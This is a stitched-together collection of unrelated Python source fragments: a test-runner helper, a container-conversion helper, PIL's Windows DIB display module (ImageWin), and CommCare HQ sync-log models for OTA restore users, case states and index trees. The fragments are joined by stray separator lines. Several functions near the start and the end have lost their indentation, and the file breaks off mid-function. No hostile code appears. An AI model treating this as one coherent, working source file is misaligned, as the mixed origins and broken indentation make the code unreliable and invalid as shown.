                out = check_output(cmd, **kwargs)
            except CalledProcessError as e:
                raise RuntimeError(u"script errored with output:\n%s"
                                   % e.output.decode('utf-8'))
            # Any stdout output is treated as a failed assertion.
            if out != b"":
                raise AssertionError(out.decode('utf-8'))
        except TimeoutExpired as e:
            raise RuntimeError(u"script timeout, output so far:\n%s"
                               % e.output.decode('utf-8'))
    finally:
        # Always remove the temporary script, even on failure.
        os.unlink(source_file)
def _convert_container(container, constructor_name, columns_name=None):
if constructor_name == 'list':
return list(container)
elif constructor_name == 'tuple':
return tuple(container)
elif constructor_name == 'array':
return np.asarray(container)
elif constructor_name == 'sparse':
return sp.sparse.csr_matrix(container)
elif constructor_name == 'dataframe':
pd = pytest.importorskip('pandas')
return pd.DataFrame(container, columns=columns_name)
elif constructor_name == 'series':
pd = pytest.importorskip('pandas')
return pd.Series(container)
elif constructor_name == 'index':
pd = pytest.importorskip('pandas')
return pd.Index(container)
elif constructor_name == 'slice':
return slice(container[0], container[1])
| |
#
# The Python Imaging Library.
# $Id$
#
# a Windows DIB display interface
#
# History:
# 1996-05-20 fl Created
# 1996-09-20 fl Fixed subregion exposure
# 1997-09-21 fl Added draw primitive (for tzPrint)
# 2003-05-21 fl Added experimental Window/ImageWindow classes
# 2003-09-05 fl Added fromstring/tostring methods
#
# Copyright (c) Secret Labs AB 1997-2003.
# Copyright (c) Fredrik Lundh 1996-2003.
#
# See the README file for information on usage and redistribution.
#
from . import Image
class HDC(object):
    """
    Wraps an HDC integer. The resulting object can be passed to the
    :py:meth:`~PIL.ImageWin.Dib.draw` and :py:meth:`~PIL.ImageWin.Dib.expose`
    methods.
    """

    def __init__(self, dc):
        # Keep the raw device-context handle.
        self.dc = dc

    def __int__(self):
        # Let the wrapper stand in wherever the raw integer is expected.
        return self.dc
class HWND(object):
    """
    Wraps an HWND integer. The resulting object can be passed to the
    :py:meth:`~PIL.ImageWin.Dib.draw` and :py:meth:`~PIL.ImageWin.Dib.expose`
    methods, instead of a DC.
    """

    def __init__(self, wnd):
        # Keep the raw window handle.
        self.wnd = wnd

    def __int__(self):
        # Let the wrapper stand in wherever the raw integer is expected.
        return self.wnd
class Dib(object):
    """
    A Windows bitmap with the given mode and size. The mode can be one of "1",
    "L", "P", or "RGB".
    If the display requires a palette, this constructor creates a suitable
    palette and associates it with the image. For an "L" image, 128 greylevels
    are allocated. For an "RGB" image, a 6x6x6 colour cube is used, together
    with 20 greylevels.
    To make sure that palettes work properly under Windows, you must call the
    **palette** method upon certain events from Windows.
    :param image: Either a PIL image, or a mode string. If a mode string is
                  used, a size must also be given. The mode can be one of "1",
                  "L", "P", or "RGB".
    :param size: If the first argument is a mode string, this
                 defines the size of the image.
    """
    def __init__(self, image, size=None):
        # Duck-type check: anything with .mode and .size is treated as a
        # PIL image; otherwise the first argument is taken as a mode string.
        if hasattr(image, "mode") and hasattr(image, "size"):
            mode = image.mode
            size = image.size
        else:
            mode = image
            image = None
        # Reduce exotic modes to a display-capable base mode.
        if mode not in ["1", "L", "P", "RGB"]:
            mode = Image.getmodebase(mode)
        self.image = Image.core.display(mode, size)
        self.mode = mode
        self.size = size
        if image:
            self.paste(image)
    def expose(self, handle):
        """
        Copy the bitmap contents to a device context.
        :param handle: Device context (HDC), cast to a Python integer, or an
            HDC or HWND instance. In PythonWin, you can use the
            :py:meth:`CDC.GetHandleAttrib` to get a suitable handle.
        """
        if isinstance(handle, HWND):
            # A window handle: acquire a DC for it and release it afterwards.
            dc = self.image.getdc(handle)
            try:
                result = self.image.expose(dc)
            finally:
                self.image.releasedc(handle, dc)
        else:
            result = self.image.expose(handle)
        return result
    def draw(self, handle, dst, src=None):
        """
        Same as expose, but allows you to specify where to draw the image, and
        what part of it to draw.
        The destination and source areas are given as 4-tuple rectangles. If
        the source is omitted, the entire image is copied. If the source and
        the destination have different sizes, the image is resized as
        necessary.
        """
        if not src:
            # Default source rectangle: the whole image.
            src = (0, 0) + self.size
        if isinstance(handle, HWND):
            # A window handle: acquire a DC for it and release it afterwards.
            dc = self.image.getdc(handle)
            try:
                result = self.image.draw(dc, dst, src)
            finally:
                self.image.releasedc(handle, dc)
        else:
            result = self.image.draw(handle, dst, src)
        return result
    def query_palette(self, handle):
        """
        Installs the palette associated with the image in the given device
        context.
        This method should be called upon **QUERYNEWPALETTE** and
        **PALETTECHANGED** events from Windows. If this method returns a
        non-zero value, one or more display palette entries were changed, and
        the image should be redrawn.
        :param handle: Device context (HDC), cast to a Python integer, or an
            HDC or HWND instance.
        :return: A true value if one or more entries were changed (this
            indicates that the image should be redrawn).
        """
        if isinstance(handle, HWND):
            # Note: `handle` is rebound to the DC here and passed as both
            # arguments to releasedc below (matches the C API usage).
            handle = self.image.getdc(handle)
            try:
                result = self.image.query_palette(handle)
            finally:
                self.image.releasedc(handle, handle)
        else:
            result = self.image.query_palette(handle)
        return result
    def paste(self, im, box=None):
        """
        Paste a PIL image into the bitmap image.
        :param im: A PIL image.  The size must match the target region.
            If the mode does not match, the image is converted to the
            mode of the bitmap image.
        :param box: A 4-tuple defining the left, upper, right, and
            lower pixel coordinate.  See :ref:`coordinate-system`. If
            None is given instead of a tuple, all of the image is
            assumed.
        """
        im.load()
        # Convert to the bitmap's mode before handing off to the C layer.
        if self.mode != im.mode:
            im = im.convert(self.mode)
        if box:
            self.image.paste(im.im, box)
        else:
            self.image.paste(im.im)
    def frombytes(self, buffer):
        """
        Load display memory contents from byte data.
        :param buffer: A buffer containing display data (usually
            data returned from <b>tobytes</b>)
        """
        return self.image.frombytes(buffer)
    def tobytes(self):
        """
        Copy display memory contents to bytes object.
        :return: A bytes object containing display data.
        """
        return self.image.tobytes()
class Window(object):
    """Create a Window with the given title size."""
    def __init__(self, title="PIL", width=None, height=None):
        # The C layer invokes __dispatcher for every UI event on this window.
        self.hwnd = Image.core.createwindow(
            title, self.__dispatcher, width or 0, height or 0
        )
    def __dispatcher(self, action, *args):
        # Route an event named <action> to the matching ui_handle_* method.
        return getattr(self, "ui_handle_" + action)(*args)
    # Event stubs below: subclasses override the ones they care about.
    def ui_handle_clear(self, dc, x0, y0, x1, y1):
        pass
    def ui_handle_damage(self, x0, y0, x1, y1):
        pass
    def ui_handle_destroy(self):
        pass
    def ui_handle_repair(self, dc, x0, y0, x1, y1):
        pass
    def ui_handle_resize(self, width, height):
        pass
    def mainloop(self):
        # Blocks until the native event loop exits.
        Image.core.eventloop()
class ImageWindow(Window):
    """Create an image window which displays the given image."""
    def __init__(self, image, title="PIL"):
        # Accept either a Dib or any PIL image (wrapped into a Dib here).
        if not isinstance(image, Dib):
            image = Dib(image)
        self.image = image
        width, height = image.size
        Window.__init__(self, title, width=width, height=height)
    def ui_handle_repair(self, dc, x0, y0, x1, y1):
        # Redraw the exposed region from the backing Dib.
        self.image.draw(dc, (x0, y0, x1, y1))
| |
from collections import defaultdict, namedtuple
from copy import copy
from datetime import datetime
import json
import itertools
from couchdbkit.exceptions import ResourceConflict, ResourceNotFound
from casexml.apps.phone.exceptions import IncompatibleSyncLogType
from corehq.toggles import LEGACY_SYNC_SUPPORT
from corehq.util.global_request import get_request_domain
from corehq.util.soft_assert import soft_assert
from corehq.toggles import ENABLE_LOADTEST_USERS
from corehq.apps.domain.models import Domain
from dimagi.ext.couchdbkit import *
from django.db import models
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.mixins import UnicodeMixIn
from dimagi.utils.couch import LooselyEqualDocumentSchema
from dimagi.utils.couch.database import get_db
from casexml.apps.case import const
from casexml.apps.case.sharedmodels import CommCareCaseIndex, IndexHoldingMixIn
from casexml.apps.phone.checksum import Checksum, CaseStateHash
import logging
logger = logging.getLogger('phone.models')
class OTARestoreUser(object):
    """
    This is the OTA restore user's interface that's used for OTA restore to properly
    find cases and generate the user XML for both a web user and mobile user.

    Note: When adding methods to this user, you'll need to ensure that it is
    functional with both a CommCareUser and WebUser.
    """

    def __init__(self, domain, couch_user, loadtest_factor=1):
        self.domain = domain
        self._loadtest_factor = loadtest_factor
        self._couch_user = couch_user

    @property
    def user_id(self):
        return self._couch_user.user_id

    @property
    def loadtest_factor(self):
        """
        Gets the loadtest factor for a domain and user. Is always 1 unless
        both the toggle is enabled for the domain, and the user has a non-zero,
        non-null factor set.
        """
        if ENABLE_LOADTEST_USERS.enabled(self.domain):
            return self._loadtest_factor or 1
        return 1

    @property
    def username(self):
        return self._couch_user.raw_username

    @property
    def password(self):
        return self._couch_user.password

    @property
    def user_session_data(self):
        return self._couch_user.user_session_data

    @property
    def date_joined(self):
        return self._couch_user.date_joined

    @property
    @memoized
    def project(self):
        # cached: Domain.get_by_name hits the database
        return Domain.get_by_name(self.domain)

    @property
    def locations(self):
        raise NotImplementedError()

    @property
    def sql_location(self):
        """User's primary SQLLocation"""
        raise NotImplementedError()

    @property
    def sql_locations(self):
        """SQLLocation objects of all locations the user is assigned to"""
        raise NotImplementedError()

    def get_fixture_data_items(self):
        raise NotImplementedError()

    def get_groups(self):
        raise NotImplementedError()

    def get_commtrack_location_id(self):
        raise NotImplementedError()

    def get_owner_ids(self):
        raise NotImplementedError()

    def get_call_center_indicators(self, config):
        # FIX: both subclasses implement this with a `config` argument; the
        # abstract signature now matches so overrides and callers agree.
        raise NotImplementedError()

    def get_case_sharing_groups(self):
        raise NotImplementedError()

    def get_fixture_last_modified(self):
        raise NotImplementedError()

    def get_ucr_filter_value(self, ucr_filter, ui_filter):
        return ucr_filter.get_filter_value(self._couch_user, ui_filter)

    def get_locations_to_sync(self):
        """
        Returns a LocationSet object containing all locations that should sync
        """
        raise NotImplementedError()
class OTARestoreWebUser(OTARestoreUser):
    """OTA restore interface for a WebUser.

    Web users carry no locations, groups, or fixtures, so most accessors
    return empty or default values.
    """

    def __init__(self, domain, couch_user, **kwargs):
        from corehq.apps.users.models import WebUser

        assert isinstance(couch_user, WebUser)
        super(OTARestoreWebUser, self).__init__(domain, couch_user, **kwargs)

    @property
    def sql_location(self):
        return None

    @property
    def sql_locations(self):
        return []

    @property
    def locations(self):
        return []

    def get_fixture_data_items(self):
        return []

    def get_groups(self):
        return []

    def get_commtrack_location_id(self):
        return None

    def get_owner_ids(self):
        # a web user only owns cases assigned directly to them
        return [self.user_id]

    def get_call_center_indicators(self, config):
        # no call center indicator data for web users
        return None

    def get_case_sharing_groups(self):
        return []

    def get_fixture_last_modified(self):
        from corehq.apps.fixtures.models import UserFixtureStatus
        return UserFixtureStatus.DEFAULT_LAST_MODIFIED

    def get_locations_to_sync(self):
        # todo: not yet implemented for web users
        from corehq.apps.locations.fixtures import LocationSet
        return LocationSet()
class OTARestoreCommCareUser(OTARestoreUser):
    """OTA restore interface for a mobile (CommCare) user.

    Mostly delegates to the wrapped CommCareUser document.
    """

    def __init__(self, domain, couch_user, **kwargs):
        from corehq.apps.users.models import CommCareUser

        assert isinstance(couch_user, CommCareUser)
        super(OTARestoreCommCareUser, self).__init__(domain, couch_user, **kwargs)

    @property
    def sql_location(self):
        return self._couch_user.sql_location

    @property
    def sql_locations(self):
        return self._couch_user.sql_locations

    @property
    def locations(self):
        return self._couch_user.locations

    def add_to_assigned_locations(self, location):
        return self._couch_user.add_to_assigned_locations(location)

    def set_location(self, location):
        return self._couch_user.set_location(location)

    def get_fixture_data_items(self):
        from corehq.apps.fixtures.models import FixtureDataItem
        return FixtureDataItem.by_user(self._couch_user)

    def get_groups(self):
        # this call is only used by bihar custom code and can be removed when that project is inactive
        from corehq.apps.groups.models import Group
        return Group.by_user(self._couch_user)

    def get_commtrack_location_id(self):
        from corehq.apps.commtrack.util import get_commtrack_location_id
        return get_commtrack_location_id(self._couch_user, self.project)

    def get_owner_ids(self):
        return self._couch_user.get_owner_ids(self.domain)

    def get_call_center_indicators(self, config):
        from corehq.apps.callcenter.indicator_sets import CallCenterIndicators
        return CallCenterIndicators(
            self.project.name,
            self.project.default_timezone,
            self.project.call_center_config.case_type,
            self._couch_user,
            indicator_config=config
        )

    def get_case_sharing_groups(self):
        return self._couch_user.get_case_sharing_groups()

    def get_fixture_last_modified(self):
        from corehq.apps.fixtures.models import UserFixtureType
        return self._couch_user.fixture_status(UserFixtureType.LOCATION)

    @memoized
    def get_locations_to_sync(self):
        from corehq.apps.locations.fixtures import get_all_locations_to_sync
        return get_all_locations_to_sync(self)
class CaseState(LooselyEqualDocumentSchema, IndexHoldingMixIn):
    """
    Represents the state of a case on a phone.
    """
    case_id = StringProperty()
    type = StringProperty()
    indices = SchemaListProperty(CommCareCaseIndex)

    @classmethod
    def from_case(cls, case):
        """Build a CaseState from either a raw case doc (dict) or a case object."""
        if isinstance(case, dict):
            # raw couch document: pull fields out by key
            return cls.wrap({
                'case_id': case['_id'],
                'type': case['type'],
                'indices': case['indices'],
            })

        return cls(
            case_id=case.case_id,
            type=case.type,
            indices=case.indices,
        )

    def __repr__(self):
        return "case state: %s (%s)" % (self.case_id, self.indices)
class SyncLogAssertionError(AssertionError):
    """AssertionError raised by sync-log consistency checks.

    Carries the ``case_id`` involved in the failed assertion so callers can
    report which case triggered it.
    """

    def __init__(self, case_id, *args, **kwargs):
        super(SyncLogAssertionError, self).__init__(*args, **kwargs)
        self.case_id = case_id
# Identifiers for the two sync-log storage formats stored in `log_format`.
LOG_FORMAT_LEGACY = 'legacy'
LOG_FORMAT_SIMPLIFIED = 'simplified'
class AbstractSyncLog(SafeSaveDocument, UnicodeMixIn):
    """Base class for a record of a single phone/server sync.

    Subclasses define how the set of cases on the phone is represented; this
    class holds the shared metadata plus the cached-restore-payload plumbing.
    """
    date = DateTimeProperty()
    # domain = StringProperty()
    user_id = StringProperty()
    previous_log_id = StringProperty()  # previous sync log, forming a chain
    duration = IntegerProperty()  # in seconds
    log_format = StringProperty()

    # owner_ids_on_phone stores the ids the phone thinks it's the owner of.
    # This typically includes the user id,
    # as well as all groups that that user is a member of.
    owner_ids_on_phone = StringListProperty()

    # for debugging / logging
    previous_log_rev = StringProperty()  # rev of the previous log at the time of creation
    last_submitted = DateTimeProperty()  # last time a submission caused this to be modified
    rev_before_last_submitted = StringProperty()  # rev when the last submission was saved
    last_cached = DateTimeProperty()  # last time this generated a cached response
    hash_at_last_cached = StringProperty()  # the state hash of this when it was last cached

    # save state errors and hashes here
    had_state_error = BooleanProperty(default=False)
    error_date = DateTimeProperty()
    error_hash = StringProperty()

    strict = True  # for asserts

    @classmethod
    def get(cls, doc_id):
        # fetch the raw doc and wrap it as this class
        doc = get_sync_log_doc(doc_id)
        return cls.wrap(doc)

    def _assert(self, conditional, msg="", case_id=None):
        # In strict mode a failed check raises SyncLogAssertionError;
        # otherwise it is only logged and flagged on the document.
        if not conditional:
            logger.warn("assertion failed: %s" % msg)
            if self.strict:
                raise SyncLogAssertionError(case_id, msg)
            else:
                self.has_assert_errors = True

    @classmethod
    def wrap(cls, data):
        ret = super(AbstractSyncLog, cls).wrap(data)
        if hasattr(ret, 'has_assert_errors'):
            # logs that previously hit assertion failures stop being strict
            ret.strict = False
        return ret

    def case_count(self):
        """
        How many cases are associated with this. Used in reports.
        """
        raise NotImplementedError()

    def phone_is_holding_case(self, case_id):
        raise NotImplementedError()

    def get_footprint_of_cases_on_phone(self):
        """
        Gets the phone's flat list of all case ids on the phone,
        owned or not owned but relevant.
        """
        raise NotImplementedError()

    def get_state_hash(self):
        # hash of the full case footprint; used to detect phone/server drift
        return CaseStateHash(Checksum(self.get_footprint_of_cases_on_phone()).hexdigest())

    def update_phone_lists(self, xform, case_list):
        """
        Given a form and list of touched cases, update this sync log to reflect the updated
        state on the phone.
        """
        raise NotImplementedError()

    def get_payload_attachment_name(self, version):
        # attachment name under which a cached restore payload is stored
        return 'restore_payload_{version}.xml'.format(version=version)

    def has_cached_payload(self, version):
        """Whether a cached restore payload for ``version`` is attached."""
        return self.get_payload_attachment_name(version) in self._doc.get('_attachments', {})

    def get_cached_payload(self, version, stream=False):
        """Return the cached restore payload, or None if there isn't one."""
        try:
            return self.fetch_attachment(self.get_payload_attachment_name(version), stream=stream)
        except ResourceNotFound:
            return None

    def set_cached_payload(self, payload, version):
        self.put_attachment(payload, name=self.get_payload_attachment_name(version),
                            content_type='text/xml')

    def invalidate_cached_payloads(self):
        # iterate over a copy since delete_attachment mutates _attachments
        for name in copy(self._doc.get('_attachments', {})):
            self.delete_attachment(name)

    @classmethod
    def from_other_format(cls, other_sync_log):
        """
        Convert to an instance of a subclass from another subclass. Subclasses can
        override this to provide conversion functions.
        """
        raise IncompatibleSyncLogType('Unable to convert from {} to {}'.format(
            type(other_sync_log), cls,
        ))

    # anything prefixed with 'tests_only' is only used in tests
    def tests_only_get_cases_on_phone(self):
        raise NotImplementedError()

    def test_only_clear_cases_on_phone(self):
        raise NotImplementedError()

    def test_only_get_dependent_cases_on_phone(self):
        raise NotImplementedError()
class SyncLog(AbstractSyncLog):
    """
    A log of a single sync operation.
    """
    log_format = StringProperty(default=LOG_FORMAT_LEGACY)
    last_seq = StringProperty()  # the last_seq of couch during this sync

    # we need to store a mapping of cases to indices for generating the footprint
    # cases_on_phone represents the state of all cases the server
    # thinks the phone has on it and cares about.
    cases_on_phone = SchemaListProperty(CaseState)

    # dependant_cases_on_phone represents the possible list of cases
    # also on the phone because they are referenced by a real case's index
    # (or a dependent case's index).
    # This list is not necessarily a perfect reflection
    # of what's on the phone, but is guaranteed to be after pruning
    dependent_cases_on_phone = SchemaListProperty(CaseState)

    @classmethod
    def wrap(cls, data):
        # last_seq used to be int, but is now string for cloudant compatibility
        if isinstance(data.get('last_seq'), (int, long)):
            data['last_seq'] = unicode(data['last_seq'])
        return super(SyncLog, cls).wrap(data)

    @classmethod
    def last_for_user(cls, user_id):
        """Return the most recent sync log for the given user, if any."""
        from casexml.apps.phone.dbaccessors.sync_logs_by_user import get_last_synclog_for_user
        return get_last_synclog_for_user(user_id)

    def case_count(self):
        # counts only "real" cases, not dependent ones
        return len(self.cases_on_phone)

    def get_previous_log(self):
        """
        Get the previous sync log, if there was one. Otherwise returns nothing.
        """
        if not hasattr(self, "_previous_log_ref"):
            # cache the result on the instance; the lookup hits the database
            self._previous_log_ref = SyncLog.get(self.previous_log_id) if self.previous_log_id else None
        return self._previous_log_ref

    def phone_has_case(self, case_id):
        """
        Whether the phone currently has a case, according to this sync log
        """
        return self.get_case_state(case_id) is not None

    def get_case_state(self, case_id):
        """
        Get the case state object associated with an id, or None if no such
        object is found
        """
        filtered_list = self._case_state_map()[case_id]
        if filtered_list:
            self._assert(len(filtered_list) == 1,
                         "Should be exactly 0 or 1 cases on phone but were %s for %s" %
                         (len(filtered_list), case_id))
            return CaseState.wrap(filtered_list[0])
        return None

    def phone_has_dependent_case(self, case_id):
        """
        Whether the phone currently has a dependent case, according to this sync log
        """
        return self.get_dependent_case_state(case_id) is not None

    def get_dependent_case_state(self, case_id):
        """
        Get the dependent case state object associated with an id, or None if no such
        object is found
        """
        filtered_list = self._dependent_case_state_map()[case_id]
        if filtered_list:
            self._assert(len(filtered_list) == 1,
                         "Should be exactly 0 or 1 dependent cases on phone but were %s for %s" %
                         (len(filtered_list), case_id))
            return CaseState.wrap(filtered_list[0])
        return None

    @memoized
    def _dependent_case_state_map(self):
        return self._build_state_map('dependent_cases_on_phone')

    @memoized
    def _case_state_map(self):
        return self._build_state_map('cases_on_phone')

    def _build_state_map(self, list_name):
        """Map case_id -> list of raw case-state dicts from the named list."""
        state_map = defaultdict(list)
        # referencing the property via self._doc is because we don't want to needlessly call wrap
        # (which couchdbkit does not make any effort to cache on repeated calls)
        # deterministically this change shaved off 10 seconds from an ota restore
        # of about 300 cases.
        for case in self._doc[list_name]:
            state_map[case['case_id']].append(case)

        return state_map

    def _get_case_state_from_anywhere(self, case_id):
        # check the primary list first, then the dependent list
        return self.get_case_state(case_id) or self.get_dependent_case_state(case_id)

    def archive_case(self, case_id):
        """Remove a case from the primary list, demoting it to a dependent
        case if anything still references it. Returns the removed CaseState
        (or None if the phone didn't have the case at all).
        """
        state = self.get_case_state(case_id)
        if state:
            self.cases_on_phone.remove(state)
            self._case_state_map.reset_cache(self)
            all_indices = [i for case_state in self.cases_on_phone + self.dependent_cases_on_phone
                           for i in case_state.indices]
            if any([i.referenced_id == case_id for i in all_indices]):
                # something still points at this case: keep it as a dependent
                self.dependent_cases_on_phone.append(state)
                self._dependent_case_state_map.reset_cache(self)
            return state
        else:
            state = self.get_dependent_case_state(case_id)
            if state:
                all_indices = [i for case_state in self.cases_on_phone + self.dependent_cases_on_phone
                               for i in case_state.indices]
                if not any([i.referenced_id == case_id for i in all_indices]):
                    # nothing references it anymore; safe to drop entirely
                    self.dependent_cases_on_phone.remove(state)
                    self._dependent_case_state_map.reset_cache(self)
                return state

    def _phone_owns(self, action):
        # whether the phone thinks it owns an action block.
        # the only way this can't be true is if the block assigns to an
        # owner id that's not associated with the user on the phone
        owner = action.updated_known_properties.get("owner_id")
        if owner:
            return owner in self.owner_ids_on_phone
        return True

    def update_phone_lists(self, xform, case_list):
        # for all the cases update the relevant lists in the sync log
        # so that we can build a historical record of what's associated
        # with the phone
        removed_states = {}
        new_indices = set()
        for case in case_list:
            actions = case.get_actions_for_form(xform)
            for action in actions:
                logger.debug('OLD {}: {}'.format(case.case_id, action.action_type))
                if action.action_type == const.CASE_ACTION_CREATE:
                    self._assert(not self.phone_has_case(case.case_id),
                                 'phone has case being created: %s' % case.case_id)
                    starter_state = CaseState(case_id=case.case_id, indices=[])
                    if self._phone_owns(action):
                        self.cases_on_phone.append(starter_state)
                        self._case_state_map.reset_cache(self)
                    else:
                        # not owned; remember it in case an index re-adds it below
                        removed_states[case.case_id] = starter_state
                elif action.action_type == const.CASE_ACTION_UPDATE:
                    if not self._phone_owns(action):
                        # only action necessary here is in the case of
                        # reassignment to an owner the phone doesn't own
                        state = self.archive_case(case.case_id)
                        if state:
                            removed_states[case.case_id] = state
                elif action.action_type == const.CASE_ACTION_INDEX:
                    # in the case of parallel reassignment and index update
                    # the phone might not have the case
                    if self.phone_has_case(case.case_id):
                        case_state = self.get_case_state(case.case_id)
                    else:
                        case_state = self.get_dependent_case_state(case.case_id)
                    # reconcile indices
                    if case_state:
                        for index in action.indices:
                            new_indices.add(index.referenced_id)
                        case_state.update_indices(action.indices)
                elif action.action_type == const.CASE_ACTION_CLOSE:
                    if self.phone_has_case(case.case_id):
                        state = self.archive_case(case.case_id)
                        if state:
                            removed_states[case.case_id] = state

        # if we just removed a state and added an index to it
        # we have to put it back in our dependent case list
        readded_any = False
        for index in new_indices:
            if index in removed_states:
                self.dependent_cases_on_phone.append(removed_states[index])
                readded_any = True
        if readded_any:
            self._dependent_case_state_map.reset_cache(self)

        if case_list:
            try:
                self.save()
                self.invalidate_cached_payloads()
            except ResourceConflict:
                logging.exception('doc update conflict saving sync log {id}'.format(
                    id=self._id,
                ))
                raise

    def get_footprint_of_cases_on_phone(self):
        def children(case_state):
            # states referenced by this state's indices (entries may be None)
            return [self._get_case_state_from_anywhere(index.referenced_id)
                    for index in case_state.indices]

        relevant_cases = set()
        queue = list(self.cases_on_phone)
        while queue:
            case_state = queue.pop()
            # I don't actually understand why something is coming back None
            # here, but we can probably just ignore it.
            if case_state is not None and case_state.case_id not in relevant_cases:
                relevant_cases.add(case_state.case_id)
                queue.extend(children(case_state))
        return relevant_cases

    def phone_is_holding_case(self, case_id):
        """
        Whether the phone is holding (not purging) a case.
        """
        # this is inefficient and could be optimized
        if self.phone_has_case(case_id):
            return True
        else:
            cs = self.get_dependent_case_state(case_id)
            if cs and case_id in self.get_footprint_of_cases_on_phone():
                return True
            return False

    def __unicode__(self):
        return "%s synced on %s (%s)" % (self.user_id, self.date.date(), self.get_id)

    def tests_only_get_cases_on_phone(self):
        return self.cases_on_phone

    def test_only_clear_cases_on_phone(self):
        self.cases_on_phone = []

    def test_only_get_dependent_cases_on_phone(self):
        return self.dependent_cases_on_phone
class IndexTree(DocumentSchema):
    """
    Document type representing a case dependency tree (which is flattened to a single dict)
    """
    # a flat mapping of cases to dicts of their indices. The keys in each dict are the index identifiers
    # and the values are the referenced case IDs
    indices = SchemaDictProperty()

    def __repr__(self):
        return json.dumps(self.indices, indent=2)

    @staticmethod
    def get_all_dependencies(case_id, child_index_tree, extension_index_tree, closed_cases=None,
                             cached_child_map=None, cached_extension_map=None):
        """Takes a child and extension index tree and returns a set of all dependencies of <case_id>

        Traverse each incoming index, return each touched case. Stop traversing
        incoming extensions if they lead to closed cases.
        Traverse each outgoing index in the extension tree, return each touched case
        """
        if closed_cases is None:
            closed_cases = set()

        def _recursive_call(case_id, all_cases, cached_child_map, cached_extension_map):
            all_cases.add(case_id)
            # cases pointing at this case through an extension index
            incoming_extension_indices = extension_index_tree.get_cases_that_directly_depend_on_case(
                case_id,
                cached_map=cached_extension_map
            )
            # skip extensions that come from closed cases
            open_incoming_extension_indices = {
                case for case in incoming_extension_indices if case not in closed_cases
            }
            all_incoming_indices = itertools.chain(
                child_index_tree.get_cases_that_directly_depend_on_case(case_id, cached_map=cached_child_map),
                open_incoming_extension_indices,
            )
            for dependent_case in all_incoming_indices:
                # incoming indices
                if dependent_case not in all_cases:
                    all_cases.add(dependent_case)
                    _recursive_call(dependent_case, all_cases, cached_child_map, cached_extension_map)

            for indexed_case in extension_index_tree.indices.get(case_id, {}).values():
                # outgoing extension indices
                if indexed_case not in all_cases:
                    all_cases.add(indexed_case)
                    _recursive_call(indexed_case, all_cases, cached_child_map, cached_extension_map)

        all_cases = set()
        # build the reverse maps once up front if they weren't supplied
        cached_child_map = cached_child_map or _reverse_index_map(child_index_tree.indices)
        cached_extension_map = cached_extension_map or _reverse_index_map(extension_index_tree.indices)
        _recursive_call(case_id, all_cases, cached_child_map, cached_extension_map)
        return all_cases

    @staticmethod
    def get_all_outgoing_cases(case_id, child_index_tree, extension_index_tree):
        """traverse all outgoing child and extension indices"""
        all_cases = set([case_id])
        new_cases = set([case_id])
        while new_cases:
            case_to_check = new_cases.pop()
            parent_cases = set(child_index_tree.indices.get(case_to_check, {}).values())
            host_cases = set(extension_index_tree.indices.get(case_to_check, {}).values())
            # only keep traversing through cases we haven't already visited
            new_cases = (new_cases | parent_cases | host_cases) - all_cases
            all_cases = all_cases | parent_cases | host_cases
        return all_cases

    @staticmethod
    def traverse_incoming_extensions(case_id, extension_index_tree, closed_cases, cached_map=None):
        """traverse open incoming extensions"""
        all_cases = set([case_id])
        new_cases = set([case_id])
        cached_map = cached_map or _reverse_index_map(extension_index_tree.indices)
        while new_cases:
            case_to_check = new_cases.pop()
            open_incoming_extension_indices = {
                case for case in
                extension_index_tree.get_cases_that_directly_depend_on_case(case_to_check,
                                                                            cached_map=cached_map)
                if case not in closed_cases
            }
            for incoming_case in open_incoming_extension_indices:
                new_cases.add(incoming_case)
                all_cases.add(incoming_case)
        return all_cases

    def get_cases_that_directly_depend_on_case(self, case_id, cached_map=None):
        # "depends on" = has an index whose referenced_id is case_id
        cached_map = cached_map or _reverse_index_map(self.indices)
        return cached_map.get(case_id, [])

    def get_all_cases_that_depend_on_case(self, case_id, cached_map=None):
        """
        Recursively builds a tree of all cases that depend on this case and returns
        a flat set of case ids.

        Allows passing in a cached map of reverse index references if you know you are going
        to call it more than once in a row to avoid rebuilding that.
        """
        def _recursive_call(case_id, all_cases, cached_map):
            all_cases.add(case_id)
            for dependent_case in self.get_cases_that_directly_depend_on_case(case_id, cached_map=cached_map):
                if dependent_case not in all_cases:
                    all_cases.add(dependent_case)
                    _recursive_call(dependent_case, all_cases, cached_map)

        all_cases = set()
        cached_map = cached_map or _reverse_index_map(self.indices)
        _recursive_call(case_id, all_cases, cached_map)
        return all_cases

    def delete_index(self, from_case_id, index_name):
        prior_ids = self.indices.pop(from_case_id, {})
        prior_ids.pop(index_name, None)
        if prior_ids:
            # put the remaining indices for this case back
            self.indices[from_case_id] = prior_ids

    def set_index(self, from_case_id, index_name, to_case_id):
        prior_ids = self.indices.get(from_case_id, {})
        prior_ids[index_name] = to_case_id
        self.indices[from_case_id] = prior_ids

    def apply_updates(self, other_tree):
        """
        Apply updates from another IndexTree and return a copy with those applied.

        If an id is found in the new one, use that id's indices, otherwise, use this ones,
        (defaulting to nothing).
        """
        assert isinstance(other_tree, IndexTree)
        new = IndexTree(
            indices=copy(self.indices),
        )
        new.indices.update(other_tree.indices)
        return new
def _reverse_index_map(index_map):
reverse_indices = defaultdict(set)
for case_id, indices in index_map.items():
for indexed_case_id in indices.values():
reverse_indices[indexed_case_id].add(case_id)
return dict(reverse_indices)
class SimplifiedSyncLog(AbstractSyncLog):
    """
    New, simplified sync log class that is used by ownership cleanliness restore.

    Just maintains a flat list of case IDs on the phone rather than the case/dependent state
    lists from the SyncLog class.
    """
    log_format = StringProperty(default=LOG_FORMAT_SIMPLIFIED)
    case_ids_on_phone = SetProperty(unicode)
    # this is a subset of case_ids_on_phone used to flag that a case is only around because it has dependencies
    # this allows us to purge it if possible from other actions
    dependent_case_ids_on_phone = SetProperty(unicode)
    owner_ids_on_phone = SetProperty(unicode)
    index_tree = SchemaProperty(IndexTree)  # index tree of subcases / children
    extension_index_tree = SchemaProperty(IndexTree)  # index tree of extensions
    closed_cases = SetProperty(unicode)  # cases known to be closed (used when computing availability)
    extensions_checked = BooleanProperty(default=False)
def save(self, *args, **kwargs):
    """Save the document, masquerading as a plain SyncLog."""
    # force doc type to SyncLog to avoid changing the couch view.
    self.doc_type = "SyncLog"
    super(SimplifiedSyncLog, self).save(*args, **kwargs)
def case_count(self):
    """Number of case ids currently on the phone (primary and dependent)."""
    return len(self.case_ids_on_phone)
def phone_is_holding_case(self, case_id):
    """
    Whether the phone currently has a case, according to this sync log
    (a simple membership test in this format).
    """
    return case_id in self.case_ids_on_phone
def get_footprint_of_cases_on_phone(self):
    """All case ids on the phone; in this format the flat list is already exact."""
